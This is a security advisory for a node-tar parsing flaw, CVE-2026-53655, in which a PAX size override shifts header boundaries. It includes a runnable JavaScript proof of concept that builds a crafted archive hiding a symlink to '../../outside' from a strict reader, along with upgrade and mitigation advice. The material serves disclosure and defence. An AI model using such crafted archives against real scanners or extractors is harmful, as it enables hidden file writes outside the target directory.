Vulnerability in node-tar Affects Tar Archive Processing
CVE-2026-53655

6.9 MEDIUM

Key Information:

Vendor: Isaacs
Status: Vendor
CVE Published: 22 June 2026

What is CVE-2026-53655?

node-tar before 7.5.16 mishandles PAX extended headers: a `size` value carried in a PAX extended header can be applied to the metadata entry that follows it, such as a GNU long-name or long-link entry, instead of to the regular entry it is meant to describe. Because the size field decides how many 512-byte blocks a reader consumes, the override shifts where node-tar expects the next header, so a crafted archive is walked differently by node-tar than by other tar implementations. An attacker can use that disagreement to make entries visible to one parser but not another, for example to keep a file out of the view of a scanner that inspects the archive while an extractor still writes it to disk. Archives that pass a security check and then extract to something different are the practical risk; upgrading to 7.5.16 or later resolves it.
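The disagreement described above, as an added example that is not node-tar's own code and does not reproduce its internals: a small tar writer builds an archive in memory (a constructed sample) in which a PAX extended header carrying `size=6` is immediately followed by a GNU long-name ('L') entry whose own header claims 1024 bytes of name data, the second block of which is a complete, valid symlink header. Two model readers then walk the same bytes: a strict one that holds the PAX override until the next regular entry, and a lenient one that lets the 'L' entry consume it, which is the behaviour the advisory describes. The entry names, the `paxSizeOverridesMetadata` switch and the symlink target are assumptions made for this example.

```javascript
'use strict';
// Added example, not node-tar's code: build a crafted tar archive in memory
// and walk it with two model readers that differ only in whether a PAX
// `size` override may apply to a GNU long-name ('L') entry.
const BLOCK = 512;
const pad = (b) => Buffer.concat([b, Buffer.alloc((BLOCK - (b.length % BLOCK)) % BLOCK)]);
const cstr = (b, off, len) => b.toString('latin1', off, off + len).split('\0')[0];
const octal = (b, off, len) => parseInt(cstr(b, off, len).trim(), 8) || 0;

// One ustar header block. `size` is written exactly as given; callers may lie.
function header({ name, type = '0', size = 0, linkname = '' }) {
  const h = Buffer.alloc(BLOCK);
  h.write(name, 0, 100, 'latin1');
  h.write('0000644\0', 100);                                   // mode
  h.write('0000000\0', 108);                                   // uid
  h.write('0000000\0', 116);                                   // gid
  h.write(size.toString(8).padStart(11, '0') + '\0', 124);     // size, octal
  h.write('00000000000\0', 136);                               // mtime
  h.write('        ', 148);                                    // checksum placeholder (8 spaces)
  h.write(type, 156);
  h.write(linkname, 157, 100, 'latin1');
  h.write('ustar\0', 257);
  h.write('00', 263);
  let sum = 0;
  for (const byte of h) sum += byte;
  h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148);
  return h;
}

// Constructed sample (assumed names and paths): PAX size=6, then an 'L' entry
// whose header claims 1024 bytes of name data. Block 1 of that data holds the
// real long name; block 2 is a complete, valid symlink header.
const LONGNAME = 'deep/'.repeat(30) + 'file.txt';            // 158 chars, longer than the 100-byte name field
function buildArchive() {
  const pax = Buffer.from('10 size=6\n');                     // one PAX record: "<len> key=value\n"
  const hiddenLink = header({ name: 'link', type: '2', linkname: '../../outside' });
  const longData = Buffer.concat([pad(Buffer.from(LONGNAME + '\0')), hiddenLink]);
  return Buffer.concat([
    header({ name: 'PaxHeader', type: 'x', size: pax.length }), pad(pax),
    header({ name: '././@LongLink', type: 'L', size: longData.length }), longData,
    header({ name: 'hello.txt', type: '0', size: 6 }), pad(Buffer.from('public')),
    Buffer.alloc(2 * BLOCK),                                  // end-of-archive marker
  ]);
}

// Walk the archive. paxSizeOverridesMetadata=false models a strict reader (the
// override waits for the next regular entry); true models the lenient behaviour
// the advisory describes (the 'L' entry consumes the override).
function readArchive(buf, { paxSizeOverridesMetadata }) {
  const entries = [];
  let pending = {};                                           // PAX overrides not yet applied
  let longname = null;                                        // name supplied by a preceding 'L' entry
  for (let off = 0; off + BLOCK <= buf.length; ) {
    const h = buf.subarray(off, off + BLOCK);
    if (h.every((byte) => byte === 0)) break;                 // first zero block ends the archive
    let sum = 8 * 0x20;                                       // checksum field counts as spaces
    h.forEach((byte, i) => { if (i < 148 || i >= 156) sum += byte; });
    if (sum !== octal(h, 148, 8)) throw new Error(`bad header checksum at offset ${off}`);
    const type = String.fromCharCode(h[156]);
    const isMeta = type === 'L';                              // GNU long-name metadata entry
    let size = octal(h, 124, 12);
    if ('size' in pending && type !== 'x' && (!isMeta || paxSizeOverridesMetadata)) {
      size = pending.size;                                    // the override decides how many blocks are read
      delete pending.size;
    }
    const data = buf.subarray(off + BLOCK, off + BLOCK + size);
    off += BLOCK + Math.ceil(size / BLOCK) * BLOCK;
    if (type === 'x') {
      for (const rec of data.toString('latin1').split('\n').filter(Boolean)) {
        const m = /^\d+ ([^=]+)=(.*)$/.exec(rec);
        if (m) pending[m[1]] = m[1] === 'size' ? Number(m[2]) : m[2];
      }
    } else if (isMeta) {
      longname = cstr(data, 0, data.length);                  // NUL-terminated long name
    } else {
      entries.push({ name: longname ?? pending.path ?? cstr(h, 0, 100), type, size,
                     linkname: cstr(h, 157, 100), content: data.toString('latin1') });
      pending = {}; longname = null;
    }
  }
  return entries;
}

const archive = buildArchive();
const strictView = readArchive(archive, { paxSizeOverridesMetadata: false });
const lenientView = readArchive(archive, { paxSizeOverridesMetadata: true });
console.log('strict :', strictView.map((e) => `${e.type} ${e.name} (${e.size}B)`));
console.log('lenient:', lenientView.map((e) => `${e.type} ${e.name} (${e.size}B) ${e.linkname}`));
```

Run with `node`. The strict reader lists a single regular file carrying the long name; the lenient reader lists a symlink (named by the truncated long name, since the override also shortens the name data it reads) followed by `hello.txt`, and never attaches the long name to that file. Any pipeline that scans with one reader and extracts with another is exposed to exactly this gap, so the practical check is to parse with the same library that will extract, and to treat a PAX `size` record that disagrees with the following entry's header as a reason to reject the archive.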

Affected Version(s)

node-tar < 7.5.16

CVSS V4

Score: 6.9
Severity: MEDIUM
Confidentiality: None
Integrity: High
Availability: None
Attack Vector: Local
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: None

Timeline

  • Vulnerability reserved

  • Vulnerability published (22 June 2026)